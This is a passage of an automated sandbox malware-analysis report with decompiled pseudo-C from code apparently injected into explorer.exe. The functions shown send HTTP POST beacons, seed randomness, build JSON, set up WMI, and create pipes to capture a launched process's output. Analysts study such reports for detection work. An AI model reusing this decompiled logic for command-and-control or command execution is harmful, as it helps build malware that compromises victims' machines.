Instruction Fuzzy Hash: 5B31E771900294AFEB60AB62EC09EFF37B8EF50750F108529F519E6192DF389944DB21

Uniqueness

Uniqueness Score: -1.00%

Function 000EE6AA, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E000EE6AA(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E000E95A8(0x85b);
				_v60 = E000E95A8(0xdc9);
				_v56 = E000E95A8(0x65d);
				_v52 = E000E95A8(0xdd3);
				_t105 = E000E95A8(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E000EC3BB(_t214));
				_t113 =  *0xfe6a4; // 0x2540cc8
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0xfe6a4; // 0x2540cc8
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0xfe788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0xfe6a4; // 0x2540cc8
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0xfe6a4; // 0x2540cc8
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0xfe6a4; // 0x2540cc8
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0xfe6a4; // 0x2540cc8
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0xfe6a4; // 0x2540cc8
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E000E97ED(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0xfe6a4; // 0x2540cc8
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E000E97ED(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E000E95A8(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0xfe6a4; // 0x2540cc8
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E000EC3BB(_t217), _a4, _a8);
										E000E85A3( &_v12);
										if(_a24 != 0) {
											E000E97ED(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0xfe6a4; // 0x2540cc8
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E000E972A( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0xfe6a4; // 0x2540cc8
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0xfe6a4; // 0x2540cc8
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0xfe6a4; // 0x2540cc8
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0xfe6a4; // 0x2540cc8
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0xfe6a4; // 0x2540cc8
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0xfe6a4; // 0x2540cc8
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0xfe6a4; // 0x2540cc8
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0xfe6a4; // 0x2540cc8
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}

0x000ee6b3
0x000ee6c5
0x000ee6ce
0x000ee6d8
0x000ee6dc
0x000ee6ed
0x000ee704
0x000ee711
0x000ee71e
0x000ee72b
0x000ee72e
0x000ee733
0x000ee738
0x000ee73a
0x000ee742
0x000ee74d
0x000ee754
0x000ee760
0x000ee763
0x000ee771
0x000ee774
0x000ee77a
0x000ee77b
0x000ee77d
0x000ee786
0x000ee787
0x000ee78c
0x000ee792
0x000ee79c
0x000ee79e
0x000ee7a3
0x000ee7a3
0x000ee7b2
0x000ee7c1
0x000ee7c5
0x000ee7d4
0x000ee7d7
0x000ee7dc
0x000ee7e0
0x000ee7e7
0x000ee7ee
0x000ee7f6
0x000ee7fe
0x000ee805
0x000ee80d
0x000ee815
0x000ee81c
0x000ee824
0x000ee82c
0x000ee841
0x000ee84e
0x000ee850
0x000ee855
0x000ee855
0x000ee85c
0x000ee86d
0x000ee872
0x000ee874
0x000ee874
0x000ee888
0x000ee89a
0x000ee89c
0x000ee89f
0x000ee8a4
0x000ee8a4
0x000ee8ab
0x000ee8ba
0x000ee8be
0x000ee8fc
0x000ee901
0x000ee909
0x000ee90e
0x000ee919
0x000ee91f
0x000ee929
0x000ee92c
0x000ee935
0x000ee93a
0x000ee93a
0x000ee943
0x000ee98c
0x000ee98e
0x000ee995
0x000ee996
0x000ee999
0x000ee99f
0x000ee9a3
0x000ee9a4
0x000ee9a9
0x000ee9ab
0x000ee9b1
0x000ee9c6
0x000ee9ce
0x000eea03
0x000eea08
0x000eea0d
0x00000000
0x000eea0f
0x000ee9d0
0x000ee9d2
0x000ee9d2
0x000ee9db
0x000ee9de
0x000ee9e0
0x000ee9e2
0x000ee9e8
0x000ee9e8
0x000ee9ed
0x000ee9ef
0x000ee9f6
0x000ee9f6
0x00000000
0x000ee9f9
0x000ee9b3
0x000ee9bb
0x00000000
0x000ee945
0x000ee945
0x000ee94b
0x000ee951
0x000ee954
0x00000000
0x000ee954
0x000ee943
0x000ee8c0
0x000ee8c6
0x000ee8ca
0x000ee8cb
0x000ee8d0
0x000ee8d2
0x000ee8d8
0x000ee8f6
0x000ee8f6
0x00000000
0x000ee8f6
0x000ee8da
0x000ee8e4
0x000ee8e6
0x000ee8e7
0x000ee8ec
0x000ee8ee
0x000ee8f4
0x00000000
0x00000000
0x00000000
0x000ee8ad
0x000ee8ad
0x000ee956
0x000ee956
0x000ee95c
0x000ee95f
0x00000000
0x000ee95f
0x000ee85e
0x000ee85e
0x000ee961
0x000ee961
0x000ee967
0x000ee96a
0x00000000
0x000ee96a
0x000ee85c
0x000ee7c7
0x000ee96c
0x000ee96f
0x000ee971
0x000ee974
0x000ee977
0x000ee980
0x000ee985
0x00000000
0x00000000
0x000ee989
0x00000000
0x000ee989
0x000ee796
0x00000000

APIs

memset.MSVCRT ref: 000EE6DC
memset.MSVCRT ref: 000EE6ED
memset.MSVCRT ref: 000EE742
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 000EE7C7

Strings

POST, xrefs: 000EE88D

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: memset$ErrorLast
String ID: POST
API String ID: 2570506013-1814004025
Opcode ID: 192c17ab923b74af2bfe27bdd9c2f701352dec90336409afd9f60fce101839c2
Instruction ID: 468e654e23abbf77687d403074460b0b90afaec3b34df150a08bca6e92d27d98
Opcode Fuzzy Hash: 192c17ab923b74af2bfe27bdd9c2f701352dec90336409afd9f60fce101839c2
Instruction Fuzzy Hash: E9B15CB1900248AFEB54DFA5DC88EEE7BF8AF58300F104069F505E72A1DB789A44DB51

Uniqueness

Uniqueness Score: -1.00%

Function 000F16F0, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E000F16F0(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}

0x000f16f9
0x000f1700
0x000f1709
0x000f170d
0x000f1788
0x00000000
0x000f178a
0x000f171b
0x000f171d
0x000f1722
0x00000000
0x00000000
0x000f172a
0x000f172c
0x000f1731
0x00000000
0x00000000
0x000f173b
0x000f173f
0x00000000
0x00000000
0x000f1741
0x000f1746
0x000f1748
0x000f1749
0x000f174d
0x000f1753
0x00000000
0x00000000
0x000f175e
0x000f1767
0x000f176b
0x00000000
0x00000000
0x000f176d
0x000f176f
0x000f1777
0x000f1779
0x000f177a
0x000f1782
0x00000000

APIs

GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,000E763B,?,?,00000000,?), ref: 000F1703
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000F171B
GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000F172A
GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 000F1739

Strings

CryptGenRandom, xrefs: 000F1724
advapi32.dll, xrefs: 000F16FB
CryptAcquireContextA, xrefs: 000F1715
CryptReleaseContext, xrefs: 000F1733

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: 0969cb67960af2247ce5bddc588210d49770403406a6cf33442754eef855381b
Instruction ID: a33105b727fb935639263e22d3816f5774c3b01fd8c95093b59de2f5c5c4f07e
Opcode Fuzzy Hash: 0969cb67960af2247ce5bddc588210d49770403406a6cf33442754eef855381b
Instruction Fuzzy Hash: F911A331A0471DBBDB616BAA8C88EFEBAF8AF45750F240064EB15E6540DA70CD01AB64

Uniqueness

Uniqueness Score: -1.00%

Function 000F215A, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E000F215A(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L000F22BD();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L000F2305();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E000E86E7(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0xf09ea
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}

0x000f215d
0x000f2162
0x000f2166
0x000f2166
0x000f216b
0x000f2170
0x000f2171
0x000f2174
0x000f2175
0x000f217a
0x000f217d
0x000f217e
0x000f2183
0x000f218a
0x000f2230
0x000f2230
0x00000000
0x000f2199
0x000f2199
0x000f21a0
0x000f21a4
0x000f21ab
0x000f21b4
0x000f21b6
0x000f21b6
0x000f21b4
0x000f21c5
0x000f21eb
0x000f21f4
0x000f21f6
0x000f21fc
0x000f222b
0x000f222b
0x000f2233
0x000f2236
0x000f2236
0x000f21fe
0x000f21ff
0x000f2205
0x000f2207
0x000f2207
0x000f220c
0x000f220b
0x000f220b
0x000f2213
0x000f221f
0x000f2229
0x000f2229
0x00000000
0x000f21d5
0x000f21d5
0x000f21d5
0x000f21db
0x00000000
0x00000000
0x000f21dd
0x000f21e3
0x000f21e8
0x00000000
0x000f21e8
0x000f21c5

APIs

_snprintf.MSVCRT ref: 000F217E
localeconv.MSVCRT ref: 000F2199
strchr.MSVCRT ref: 000F21AB
strchr.MSVCRT ref: 000F21BC
strchr.MSVCRT ref: 000F21CA
strchr.MSVCRT ref: 000F21EF

Strings

%.*g, xrefs: 000F2175

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: strchr$_snprintflocaleconv
String ID: %.*g
API String ID: 1910550357-952554281
Opcode ID: 430ed88441690797416a28063545a2500a52ac331783eb4620f715b55d6caf78
Instruction ID: 7d13bb943eea50242cad3e75f5036a65bd9bcd02adc161525f1ace0f77484406
Opcode Fuzzy Hash: 430ed88441690797416a28063545a2500a52ac331783eb4620f715b55d6caf78
Instruction Fuzzy Hash: 8B21487624460D7AD7B19A6CAC95BBB37DCEF15320F150015FB448AA83DA75ED40B3A0

Uniqueness

Uniqueness Score: -1.00%

Function 000F02EA, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON

Download Yara Rule

APIs

_snprintf.MSVCRT ref: 000F036A
qsort.MSVCRT ref: 000F05E8

Strings

null, xrefs: 000F032F
false, xrefs: 000F034D
%I64d, xrefs: 000F035C
true, xrefs: 000F0341

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: _snprintfqsort
String ID: %I64d$false$null$true
API String ID: 756996078-4285102228
Opcode ID: 12773a9337753c6cdc47e8a32aa5e483b1af14092e35ec2e54e6f723692aac85
Instruction ID: 4478b861a6c42958881d81de9505b1b53114dcd999a18072687d91b43d7e8d07
Opcode Fuzzy Hash: 12773a9337753c6cdc47e8a32aa5e483b1af14092e35ec2e54e6f723692aac85
Instruction Fuzzy Hash: 82E14DB160020EBBDF11AF64CC46EFF7BA9EF54340F108019FF5496543EA759A61ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 000ED78A, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 000ED79E
SysAllocString.OLEAUT32(?), ref: 000ED7A6
SysAllocString.OLEAUT32(00000000), ref: 000ED7BA
SysFreeString.OLEAUT32(?), ref: 000ED835
SysFreeString.OLEAUT32(?), ref: 000ED838
SysFreeString.OLEAUT32(?), ref: 000ED83D

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 2c05fb9ed2aa5c90780cf1baf5052b5911bd786d43b36aa5e30cad13974bc3a2
Instruction ID: 6d1d2c33fbe980b0a0b1d62c2b5f4e2a76daed2273eea357f3dc815cae45a053
Opcode Fuzzy Hash: 2c05fb9ed2aa5c90780cf1baf5052b5911bd786d43b36aa5e30cad13974bc3a2
Instruction Fuzzy Hash: F421F876E00218BFDB10DFA5CD88DAFBBBDEF48354B10449AF505A7251DA70AE05DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000F082F, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

\u%04X\u%04X, xrefs: 000F0988
@, xrefs: 000F089D
\u%04X, xrefs: 000F0949

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: @$\u%04X$\u%04X\u%04X
API String ID: 0-2132903582
Opcode ID: 7d4bd7c13bc957ba6e4ed0afdf9a5f89445b0bc5a704bd22d35265e178d7aef1
Instruction ID: b734b68666dffe1b6fe7466cdc2c82a24f0f9d3fea324d8e0a38aaeae0455602
Opcode Fuzzy Hash: 7d4bd7c13bc957ba6e4ed0afdf9a5f89445b0bc5a704bd22d35265e178d7aef1
Instruction Fuzzy Hash: 5E41EC7170820D57FB7889588D9ABFE36A8EF40350F140125FB82D6E43FAA58D91B3D1

Uniqueness

Uniqueness Score: -1.00%

Function 000ED565, Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E000ED565(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0xfb848, 0, 1, 0xfb858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E000E85E5(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}

0x000ed572
0x000ed575
0x000ed578
0x000ed589
0x000ed58f
0x000ed5a0
0x000ed5a8
0x000ed5f9
0x000ed5f9
0x000ed5fe
0x000ed603
0x000ed603
0x000ed606
0x000ed60b
0x000ed610
0x000ed610
0x000ed613
0x000ed5aa
0x000ed5ab
0x000ed5b1
0x000ed5c2
0x000ed5c7
0x00000000
0x000ed5c9
0x000ed5d6
0x000ed5de
0x00000000
0x000ed5e0
0x000ed5e2
0x000ed5ea
0x00000000
0x000ed5ec
0x000ed5ef
0x000ed5f5
0x000ed5f5
0x000ed5ea
0x000ed5de
0x000ed5c7
0x000ed618

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 000ED578
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000ED589
CoCreateInstance.OLE32(000FB848,00000000,00000001,000FB858,?), ref: 000ED5A0
SysAllocString.OLEAUT32(00000000), ref: 000ED5AB
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 000ED5D6

Part of subcall function 000E85E5: RtlAllocateHeap.NTDLL(00000008,?,?,000E8F65,00000100,?,000E5FAC), ref: 000E85F3

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
String ID:
API String ID: 1610782348-0
Opcode ID: 4623d2d63fb5c660366e56ebcf9a21125b33cf92ed5e08e6c136c5da52415795
Instruction ID: 69a9103fb7814f7aa483aeaa4d7b7a2f1544babcfc80f83918a2c75d1951f813
Opcode Fuzzy Hash: 4623d2d63fb5c660366e56ebcf9a21125b33cf92ed5e08e6c136c5da52415795
Instruction Fuzzy Hash: 7821FA31600285BFE7248B57DC4DEABBFBCEFC2B15F10415DB505AA290DB709A01DA60

Uniqueness

Uniqueness Score: -1.00%

Function 000F2237, Relevance: 7.6, APIs: 5, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E000F2237(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L000F2305();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L000F22C9();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0xf8250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L000F22C9();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0xf8258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}

0x000f2237
0x000f223f
0x000f2244
0x000f2247
0x000f224c
0x000f2252
0x000f225b
0x000f225f
0x000f225f
0x000f225b
0x000f2261
0x000f2266
0x000f226f
0x000f2274
0x000f2277
0x000f2280
0x000f2282
0x000f2289
0x000f229a
0x000f229a
0x000f229c
0x000f22a4
0x000f22ab
0x00000000
0x000f22a6
0x000f22aa
0x000f22aa
0x000f228b
0x000f228b
0x000f2291
0x000f2293
0x000f2298
0x000f22ae
0x000f22b1
0x000f22b6
0x00000000
0x00000000
0x00000000
0x000f2298

APIs

localeconv.MSVCRT ref: 000F223F
strchr.MSVCRT ref: 000F2252
_errno.MSVCRT ref: 000F2261
strtod.MSVCRT ref: 000F226F
_errno.MSVCRT ref: 000F229C

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: _errno$localeconvstrchrstrtod
String ID:
API String ID: 1035490122-0
Opcode ID: 05044413bf065c1245e4b7654fa0899439314d734cdaadb7f5881ff3f374ec92
Instruction ID: 5e471e40c45520a456757cf160153f24e3c483c05a03203f0159d3d160db4079
Opcode Fuzzy Hash: 05044413bf065c1245e4b7654fa0899439314d734cdaadb7f5881ff3f374ec92
Instruction Fuzzy Hash: D801D835900109BADB516F24E9017FD7BA4AF46360F2141D0EB80669D2DB759554F760

Uniqueness

Uniqueness Score: -1.00%

Function 000EA9F9, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177
pipeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E000EA9F9(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E000E85FB( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0xfe684; // 0x25bf8f0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0xfe684; // 0x25bf8f0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E000E85E5(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0xfe684; // 0x25bf8f0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
